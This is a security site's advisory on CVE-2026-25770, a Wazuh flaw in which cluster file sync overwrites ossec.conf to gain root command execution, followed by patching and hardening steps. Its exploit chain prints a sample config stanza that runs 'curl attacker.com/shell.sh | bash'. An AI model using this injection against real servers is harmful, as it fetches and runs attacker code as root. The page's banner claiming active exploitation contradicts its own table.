Skip to main content
COSMICBYTEZLABS
NewsSecurityHOWTOsToolsStudyTraining
ProjectsChecklistsAI RankingsNewsletterStatusTagsAbout
Subscribe

Press Enter to search or Esc to close

News
Security
HOWTOs
Tools
Study
Training
Projects
Checklists
AI Rankings
Newsletter
Status
Tags
About
RSS Feed
Reading List
Subscribe

Stay in the Loop

Get the latest security alerts, tutorials, and tech insights delivered to your inbox.

Subscribe NowFree forever. No spam.
COSMICBYTEZLABS

Your trusted source for IT intelligence, cybersecurity insights, and hands-on technical guides.

429+ Articles
114+ Guides

CONTENT

  • Latest News
  • Security Alerts
  • HOWTOs
  • Projects
  • Exam Prep

RESOURCES

  • Search
  • Browse Tags
  • Newsletter Archive
  • Reading List
  • RSS Feed

COMPANY

  • About Us
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CosmicBytez Labs. All rights reserved.

System Status: Operational
  1. Home
  2. Security
  3. CVE-2026-25770: Wazuh Privilege Escalation to Root via Cluster Protocol File Write
CVE-2026-25770: Wazuh Privilege Escalation to Root via Cluster Protocol File Write

Critical Security Alert

This vulnerability is actively being exploited. Immediate action is recommended.

SECURITYCRITICALCVE-2026-25770

CVE-2026-25770: Wazuh Privilege Escalation to Root via Cluster Protocol File Write

A critical privilege escalation vulnerability (CVSS 9.1) in Wazuh versions 3.9.0–4.14.2 allows authenticated cluster nodes to overwrite the manager...

Dylan H.

Security Team

March 18, 2026
5 min read

Affected Products

  • Wazuh 3.9.0 – 4.14.2

CVE-2026-25770: Wazuh Root RCE via Cluster Protocol File Write

A critical privilege escalation vulnerability has been disclosed in Wazuh, the open-source SIEM and XDR platform, tracked as CVE-2026-25770 (CVSS 9.1, Critical). The flaw affects Wazuh versions 3.9.0 through 4.14.2 and allows an authenticated cluster node to escalate to root code execution on the Wazuh manager by overwriting the manager configuration file via the cluster synchronization protocol.

Unlike the companion CVE-2026-25769 (insecure deserialization RCE), this vulnerability exploits a design flaw in the cluster file synchronization mechanism combined with insecure default file permissions — enabling an indirect but reliable root code execution path. The fix is available in Wazuh 4.14.3, released March 17, 2026.


Vulnerability Overview

AttributeValue
CVE IDCVE-2026-25770
CVSS Score9.1 (Critical)
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
CWE ClassificationCWE-22 (Path Traversal), CWE-269 (Improper Privilege Management), CWE-732 (Incorrect Permission Assignment)
GHSA IDGHSA-r4f7-v3p6-79jm
Affected SoftwareWazuh 3.9.0 – 4.14.2
Fixed VersionWazuh 4.14.3
Attack VectorNetwork
Authentication RequiredHigh (cluster credentials)
ScopeChanged — wazuh-user escalates to root via trusted service
In-the-Wild ExploitationNot confirmed at time of disclosure
Patch AvailableYes — March 17, 2026

Technical Analysis

Root Cause: Insecure File Permissions + Cluster File Sync

The wazuh-clusterd service provides a cluster synchronization protocol that allows authenticated cluster nodes to distribute files across the Wazuh cluster. The vulnerability arises from two compounding issues:

  1. Unrestricted file write via cluster protocol: Authenticated cluster nodes can write arbitrary files to the manager filesystem under the wazuh system user's permissions — without sufficient path restrictions
  2. Insecure default permissions on ossec.conf: The main Wazuh manager configuration file at /var/ossec/etc/ossec.conf is writable by the wazuh system user by default

Exploit Chain

1. Attacker gains access to cluster credentials
   (via compromise of a worker node, credential theft, or insider access)
 
2. Uses the cluster file synchronization protocol to overwrite
   /var/ossec/etc/ossec.conf with a modified configuration
 
3. The malicious ossec.conf includes an injected <localfile> command stanza:
   <localfile>
     <log_format>command</log_format>
     <command>curl attacker.com/shell.sh | bash</command>
     <frequency>60</frequency>
   </localfile>
 
4. wazuh-logcollector (running as root) parses the updated configuration
   on its next config reload cycle
 
5. logcollector executes the injected command with root privileges
 
6. Attacker achieves full root code execution on the Wazuh manager

Why logcollector Runs as Root

wazuh-logcollector requires root privileges to read system log files (e.g., /var/log/auth.log, kernel logs, SELinux audit logs) and to bind to privileged monitoring interfaces. This design is a common pattern in SIEM agents — but it means that any configuration injection into the logcollector config file directly results in root-level command execution.


Relationship to CVE-2026-25769

Both CVE-2026-25769 and CVE-2026-25770 were disclosed simultaneously and patched in Wazuh 4.14.3. They share a common attack prerequisite (access to cluster credentials or a worker node) but exploit distinct mechanisms:

CVE-2026-25769CVE-2026-25770
MechanismJSON deserialization RCEConfig file overwrite → root command exec
Affected Versions4.0.0 – 4.14.23.9.0 – 4.14.2
CWECWE-502 (Deserialization)CWE-22, CWE-269, CWE-732
Speed to RootDirect (immediate RCE on master)Indirect (waits for logcollector reload)
Detection ComplexityModerateLower — config file changes are logged

Both vulnerabilities should be treated with equal urgency and remediated simultaneously by upgrading to 4.14.3.


Impact Assessment

Impact AreaDescription
ConfidentialityRoot access exposes all Wazuh data, agent credentials, and API keys
IntegrityConfiguration manipulation can disable alerting, alter detection thresholds, or suppress security events
AvailabilityRoot access enables persistent backdoor installation or full service destruction
Blast RadiusWazuh master typically has agent management access across all monitored endpoints
SIEM IntegrityCompromise of the security monitoring platform removes detection capability across the entire monitored environment

Remediation

Primary Fix: Upgrade to Wazuh 4.14.3

# Update all Wazuh manager nodes
apt-get update && apt-get install wazuh-manager=4.14.3-*
 
# Restart the manager
systemctl restart wazuh-manager
 
# Verify the fix
/var/ossec/bin/wazuh-control info | grep -i version

Harden File Permissions (Defense-in-Depth)

Even after patching, review and restrict permissions on critical Wazuh config files:

# Restrict ossec.conf to root-only write
chown root:wazuh /var/ossec/etc/ossec.conf
chmod 640 /var/ossec/etc/ossec.conf
 
# Audit all files writable by the wazuh user in the ossec directory
find /var/ossec -user wazuh -writable -type f | grep -v "queue\|logs\|tmp"

Monitor for Configuration Changes

# Add inotifywait monitoring for ossec.conf modifications
inotifywait -m /var/ossec/etc/ossec.conf -e modify |
  while read path action file; do
    echo "ossec.conf modified — audit immediately" | logger -p security.alert
  done
 
# Review cluster sync activity
grep "cluster\|sync\|file" /var/ossec/logs/cluster.log | tail -200

Any unexpected modifications to /var/ossec/etc/ossec.conf outside of normal change management windows should be treated as a potential compromise indicator.


Key Takeaways

  1. CVE-2026-25770 allows authenticated cluster nodes to overwrite ossec.conf, triggering root command execution via the wazuh-logcollector service
  2. CVSS 9.1 (Critical) — closely mirrors the impact scope of companion CVE-2026-25769, which was disclosed and patched simultaneously
  3. Broader version range (3.9.0–4.14.2) vs CVE-2026-25769 (4.0.0–4.14.2) — organizations on older Wazuh versions are equally at risk
  4. No confirmed in-the-wild exploitation at disclosure, but given simultaneous Mirai activity targeting CVE-2026-25769, exploitation of CVE-2026-25770 should be anticipated
  5. Upgrade to Wazuh 4.14.3 resolves both CVEs — prioritize if you are running any Wazuh cluster deployment
  6. File permission hardening provides meaningful defense-in-depth even on patched systems

Sources

  • CVE-2026-25770 — NIST NVD
  • GHSA-r4f7-v3p6-79jm — Wazuh Privilege Escalation via Cluster Protocol File Write (GitHub Advisory)
  • Wazuh Manager Privilege Escalation to Root RCE via Cluster Protocol — TheHackerWire
  • CVE-2026-25770 — CIRCL Vulnerability Lookup
#Wazuh#Privilege Escalation#CVE-2026-25770#CWE-22#CWE-269#SIEM#Vulnerability#Critical

Related Articles

CVE-2026-25769: Wazuh Critical RCE via Insecure Deserialization in Cluster Protocol

A critical remote code execution vulnerability (CVSS 9.1) in Wazuh versions 4.0.0–4.14.2 allows an attacker with access to a worker node to achieve root...

6 min read

CVE-2026-22172: OpenClaw Critical Authorization Bypass via WebSocket Scope Elevation

A critical CVSS 9.9 authorization bypass in OpenClaw allows authenticated users to self-declare elevated scopes over WebSocket connections without...

6 min read

CVE-2016-20024: ZKTeco ZKTime.Net Insecure File Permissions Allow Privilege Escalation

ZKTeco ZKTime.Net 3.0.1.6 ships with world-writable directory permissions on its installation folder, allowing any local unprivileged user to replace...

5 min read
Back to all Security Alerts